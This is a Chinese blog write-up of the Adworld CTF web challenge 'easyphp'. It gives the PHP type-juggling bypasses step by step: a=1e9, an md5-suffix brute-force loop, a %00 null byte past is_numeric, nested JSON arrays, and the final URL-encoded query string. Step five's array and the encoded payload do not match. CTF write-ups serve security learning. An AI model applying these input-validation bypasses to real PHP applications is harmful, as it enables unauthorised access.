攻防世界ctf web easyphp题解wp

最新推荐文章于 2024-04-09 20:47:39 发布
最新推荐文章于 2024-04-09 20:47:39 发布
阅读量3.5k 收藏 3
点赞数 7
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41169485/article/details/127097629
版权

第一步,用科学计数法绕过 a=1e9

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)#$a=1e9

第二步,用php代码编写MD5碰撞脚本得到b=53724

for($i = 1;$i <= 100000;$i++){
    if('8b184b' === substr(md5($i),-6,6)){
        echo $i."<br>".md5($i);
    }
}


第三步,绕过is_numeric函数

$c=(array)json_decode(@$_GET['c']); #接收json格式的字符串并将其转化为数组

c={"m":"2033%00"}#使用%00可以绕过is_numeric函数


第四步,绕过is_array函数

c={"m":"2033%00","n":[[1]]}

 第五步,绕过array_search函数

c={"m":"2033%00","n":[[0,2],0]}


#对{"m":"2033%00","n":[[0,2],0]}进行url编码得到:
%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

一定要对传值url编码

?a=1e9&b=53724&c=%7B%22m%22%3A%222033%2500%22%2C%22n%22%3A%5B%5B1%5D%2C0%5D%7D

提交得到flag

 

中原第一高手
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
攻防世界pacp1杂项
11-15
攻防世界pacp1杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127862299
CTF Web方向考点总结
qq_41513009的博客
09-20 1万+
ctf web考点总结
攻防世界easyphpPHP代码审计)
最新发布
2302_79800344的博客
04-09 758
is_numeric()函数判断。
CTF攻防世界web初级区详解
qq_62540010的博客
12-05 4131
最近几天刚刚接触了ctf,去尝试了一下攻防世界web区的新手篇题目,以下解题过程记录一下自己的学习体会与心得,如果哪里有错可以在评论区告诉我,我及时改正。 1.view_source 1.1获取场景后: 1.2根据题目要求,我们需要查看网页源代码,打开方式一种是鼠标右键打开,一种是按F12键,题目规定无法右键,所以我们按F12打开,如图: 1.3第二种解法:在其他网页打开源代码后把地址换成该网页地址,即view-source:后加上该网页地址,如图: 至此拿到flag,第一题完成 2.robot
CTF——web个人总结
recover517的博客
05-28 1万+
包含个人总结的解题思路、注入思路、文件包含思路、源码审计思路等
攻防世界--simple php,easy php
m0_67467924的博客
04-20 875
第一个if判断语句,使用isset判断变量a是否申明,使用intval获取变量的整数值,并判断其值大于6000000,使用strlen函数判断变量a的长度,且长度小于等于3.若三个同时满足,那么进行二次判断,若变量b也有声明,同时他的值在使用md5加密后使用substr函数获取加密后的6位,且这6位的值为8b84b,如果满足就给key变量赋值为1;最后我们来绕过c,首先c是一个数组,且数组中存在m键,因为m不能为数值型,但又要大于2022,于是我们选择构造5555ab这个字符来绕过。进入环境,代码审计,
攻防世界easyphp
RexHa的博客
02-01 4151
攻防世界 easyphp
Web安全攻防世界05 easyphp(江苏工匠杯)
weixin_42789937的博客
12-04 3728
Web安全攻防世界05 easyphp(江苏工匠杯),呃...我php0基础,自己解题,所以写得会很啰嗦...内容对小白依然非常友好~
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web题思路总结笔记
攻防世界-easyphp
weixin_49539962的博客
08-20 303
c要是json格式,m键且不能是整数类型,但要大于2022,n键要是一个列表,并且列表的第一个元素也是列表。需要满足a表示一个大于6000000长度小于等于3的数,这就会用到科学计数法,例如1e9。b需要md5值的倒数6位为8b184b。md5彩虹表可以通过获得。构造payload类似于“
easyphp
qq_51979295的博客
09-20 218
php数据类型小综合
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CtfHub-wpweb
01-23
ctfhub平台webwp
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
ctfweb攻防工具-御剑1.5.7z
04-06
御剑1.5版本
ctf.show web入门
nidaxin的博客
01-21 5034
信息收集 web1:【where is flag】 打开开发者工具 web2:【无法查看源代码】 ctrl+u或者开发者工具·都可以 web3:【where is flag】 直接抓包,查看响应包 web4:【robots】 Robots协议:也称为爬虫协议、机器人协议等,其全称为“网络爬虫排除标准",它通常是一个叫做robots.txt的文本文件,一般放在网站的根目录下。网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 先抓包,发现响应包里面并没有f.
CTF解题-web
qq_42936836的博客
08-24 5261
记录的一些CTFweb题目~~~
CTFWEB基础篇
Innocence_0的博客
03-15 1650
简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。作用JavaScript 是脚本语言JavaScript 是一种轻量级的编程语言。JavaScript 是可插入 HTML 页面的编程代码。JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 很容易学习。
[CTF] CTFShow→WEB入门→信息收集【web 1~web 20】
ZXW_NUDT的博客
12-21 750
web 1 playload: 按F12查看源码 web 2 js前台拦截,按F12打不开源码 playload: 方法一: 在URL前加上 view-source: 方法二: win+r打开命令界面 输入:curl http://…(URL)… web 3 如图 web 4 URL后加上/robots.txt robots.txt提示↓ User-agent: * Disallow: /flagishere.txt 直接访问flagishere.txt拿到flag web 5
攻防世界 easyphp
09-11
EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值